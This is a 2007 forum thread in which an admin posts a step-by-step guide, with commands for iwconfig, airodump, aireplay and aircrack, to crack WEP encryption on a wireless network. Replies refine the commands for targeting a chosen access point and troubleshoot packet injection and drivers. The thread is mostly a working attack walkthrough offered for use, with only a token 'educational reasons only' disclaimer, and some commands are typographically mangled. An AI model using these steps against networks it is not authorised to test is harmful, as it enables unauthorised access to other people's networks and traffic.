| User | Post |
|
12:15 am
June 14, 2007
|
Patchy
| | Champaign, IL | |
| Admin
| posts 1648 | |
|
|
[size=2][b]Cracking Wired Equivalent Privacy (WEP)[/b][/size]
WEP encrypts packets during transmission with the use of a shared key. WEP functions in four steps.
1. 24-bit initialization vector (IV) is generated and combined with the secret shared key. This value is passed to the PRNG to a key stream of bits.
2. The data to be encrypted is passed to a CRC
3. And that value is XORed with the key steam.
4. The unencrypted IV is added to the ciphered data and the entire packet is transmitted.
The problem with WEP is that the IVs are not properly used. Every time a packet is encrypted it is given a unique IV; however, being only 24 bits in length there is only 16,777,215 possible. A Wireless LAN transmitting at 11 Mbps transmit about 700 packets each second. Also, the IVs are in plaintext the attacker can capture the packets.
This video shows you how to crack 128 bit WEP in only 15 minutes. It is for educational reasons only of course.
[b][u]Steps:[/u][/b]
1) Set wireless card to monitor mode
ex. iwconfig wlan0 mode monitor
2) Run airodump to capture IVs
ex. airodump wlan0 /tmp/dump
3) Use aireplay to continually send copies of packets, so you can gather IVs faster
ex. aireplay -2 wlan0 (then select a packet that has the same BSSID as the wireless router you are cracking)
4) Wait! in this video a wait 13 minutes and by that time I have collected 529,340 IVs (I have cracked WEP with only 200,000 IVs but it took 9 minutes to crack.)
5) Crack the WEP password with aircrack!
ex. aircrack /tmp/dump-01.cap (the location of your airodump dump file)
With over 500,000 IVs it takes about 11 seconds to crack
|
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another."n~ Blaise Pascal, Pensées
|
|
|
9:34 am
June 18, 2007
|
hyya
| | |
| Newbie | posts 1 | |
|
|
Hi Guys , great stuff in your Vids.. I have just downloaded a copy of backtrack 2, but I am having problems with these commands shown here and in the Vid, any suggestions?
I am not able to get airodump going:(
The Cd used in the Vid, was it version one of backtrack, were there some configurations made to it? is there any chance to get a download of the one you used..
Thanks In Advance !!!
|
|
|
11:51 am
June 19, 2007
|
Patchy
| | Champaign, IL | |
| Admin
| posts 1648 | |
|
|
In the video we use the first Backtrack because it works better with my wireless card. I think airodump-ng is used in backtrack 2, it pretty much the same thing. The commands will vary by version, type of wireless card, etc. Also, I forgot to mention that you have to enable the wireless card with the [i]ifconfig [interface] up[/i] command. I think you can download older versions from the their website.
|
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another."n~ Blaise Pascal, Pensées
|
|
|
2:42 pm
June 29, 2007
|
AnalyseR
| | |
| Newbie | posts 1 | |
|
|
Hello people… great stuff…
I have a sony vaio fj3s.. is there any website with drivers for my wireless card, for linux? Thanks…
|
|
|
11:02 pm
July 6, 2007
|
Patchy
| | Champaign, IL | |
| Admin
| posts 1648 | |
|
|
hmm check out sony's website… my guess is it isn't going to work because i have an internal intel wireless card and it doesn't work =\ just use a cheap usb wireless card those work pretty well and you will be able to use it with VMware!
|
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another."n~ Blaise Pascal, Pensées
|
|
|
10:01 pm
July 25, 2007
|
TheGuy
| | |
| Newbie | posts 2 | |
|
|
Does anyone know the airodump-ng command for /tmp/dump??? it works with airodump but not -ng
|
|
|
10:12 pm
July 25, 2007
|
TheGuy
| | |
| Newbie | posts 2 | |
|
|
Does anyone know the airodump-ng command for /tmp/dump??? it works with airodump but not -ng
|
|
|
6:00 pm
July 26, 2007
|
Patchy
| | Champaign, IL | |
| Admin
| posts 1648 | |
|
|
for airodump-ng you have to use '-w /tmp/dump'
|
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another."n~ Blaise Pascal, Pensées
|
|
|
5:21 am
July 27, 2007
|
psycholozopher
| | |
| Newbie | posts 1 | |
|
|
hey…
hmm what is the command for putting my wifi card in monitor mode?? i've got an atheros..
and how can i enable it again..and im using vista
thxx
|
|
|
7:49 pm
July 27, 2007
|
computergeek
| | |
| Newbie | posts 5 | |
|
|
For those of you using Backtrack 2:
1. To put your wireless card in the correct mode you must first find out what the device name is by entering the following: ifconfig – this command show report your device as being something like ra0, ath0 or something similar.
To put the card into "monitor mode" enter the following:
ifconfig 'devicename' down press enter
iwconfig 'devicename' mode monitor press enter
ifconfig 'devicename' up press enter
For example, I use the following three lines, pressing enter after entering each one.
ifconfig ra0 down
iwconfig ra0 mode monitor
ifconfig rao up
2. To start airodump-ng and capture IVs
You must first know the bssid and the essid of the AP that you want to attack.
The bssid is the MAC address of the AP, the channel, and the essid is the Network Name.
You can start airodump to find out this information by entering the following command:
airodump-ng ra0
This will make airdump scan each wireless channel continuously. When you find the network that you want to attack, write down its AP MAC, channel and the Network name.
Then stop airodump by pressing ctrl + c.
Then start airodump again with the command:
airodump-ng –channel (the channel the network is on) –write (name of file you want to write to) –ivs (name of device) then press enter.
I use the following:
airodump-ng –channel 9 –write output –ivs ra0
This command tells airodump that you want to monitor channel 9, write all captured IVs to a file called output (which will be located in the same directory you are in).
Once you have started airodump you can then inject packets or do whatever you want to create traffic and capture enough IVs that you can then crack the WEP.
|
|
|
7:52 pm
July 27, 2007
|
computergeek
| | |
| Newbie | posts 5 | |
|
|
Note:
On the above commands, you need to use two minus signs, – - (without the space). They look like dashes on the above post.
E.G. Airodump-ng – - channel 9 – - write output – - ivs ra0
|
|
|
11:56 am
August 5, 2007
|
Alucard_Hellsing
| | |
| Newbie | posts 4 | |
|
|
I get this error
Error for wireless request "set mode" (8B06)
Set failed on device ath0 ; invalid argument
|
|
|
11:00 pm
August 6, 2007
|
mcro
| | |
| Newbie | posts 3 | |
|
|
Hmm, looks like everything works for me. I followed "computergeeks" steps using version two.
However! when i use aireplay-ng to gen traffic – it doesnt increase the data (IV's) at all .. or very quickly.
In some cases do you need a second NIC for this operation?
LMK. thanks. :)
|
|
|
2:18 am
August 7, 2007
|
Patchy
| | Champaign, IL | |
| Admin
| posts 1648 | |
|
|
Does the new aireplay-ng select the packet to be repeated for you? or is it like the old version on Backtrack 1 that asks you to choose the packet. If you have to select the packet make sure you choose a packet that goes from the client to the server (Just look at the Mac Address) and make sure the Mac address isn't a broadcast Mac (FF:FF:FF:FF:FF:FF). Just keep trying different packets until the IVs increase rapidly.
|
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another."n~ Blaise Pascal, Pensées
|
|
|
9:23 am
August 7, 2007
|
mcro
| | |
| Newbie | posts 3 | |
|
|
aireplay-ng does infact select the packet and has the correct mac address of the device which im trying to generate traffic to.
I've tried using auto select and I've tried doing it manually, typing in the mac address which I want to use…neither one generate traffic and increase the IV's… sucks huh? :P
:/ not sure, I'm thinking it may need a second wireless card to gen the traffic while the other one montiors? Might be a code flaw with some?
LMK thanks, :)
|
|
|
9:40 am
August 7, 2007
|
mcro
| | |
| Newbie | posts 3 | |
|
|
Also just in addition – I ran airodump-ng (without specifying a specific hosts…in other words logging all IV's from all current signals) and none of them were increasing rapidly – further pointing at the fact that my NIC was not generating any traffic.
|
|
|
3:31 pm
August 7, 2007
|
james9r9r
| | |
| Newbie | posts 2 | |
|
|
Yess well I have a laptop with built in wireless chip but It's an ath0 and when I start up backtrack i get the error when I type 'iwconfig ath0 mode monitor' in the shell konsle?
|
|
|
3:34 pm
August 7, 2007
|
james9r9r
| | |
| Newbie | posts 2 | |
|
|
Yess well I have a laptop with built in wireless chip but It's an ath0 and when I start up backtrack i get the error when I type 'iwconfig ath0 mode monitor' in the shell konsle?
|
|
|
2:44 pm
August 10, 2007
|
singhkhalsa
| | |
| Newbie | posts 5 | |
|
|
Yellow Fellaz,
I'm having a bit problem. I had over 2 million packets. But when I tried to crack the code, BT2 gave me a message saying not enough wep packets read. In the packet injection window, I had 4 milion packets sent,2 million ARPs, and 2 million packets read. What am I doing wrong. How do I make it read more packets. Can someone shine some light on that. Thanks.
|
|
|
6:49 pm
August 10, 2007
|
Patchy
| | Champaign, IL | |
| Admin
| posts 1648 | |
|
|
@mcro and singhkhalsa: Seems that you both are having the same problem with backtrack 2. i have never tried to crack WEP with BT2 why don't you guys try using Backtrack 1 final that what is used in the video.
@james9r9r: My internal intel chipset wireless card doesn't not work with backtrack. Backtrack sees the card but doesn't recognize it as a wireless card, so your best bet would be to buy a cheap wireless usb card (I like linksys brand).
|
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another."n~ Blaise Pascal, Pensées
|
|
Login 
Register 
Search 
Print this Post 
9
Topic RSS 
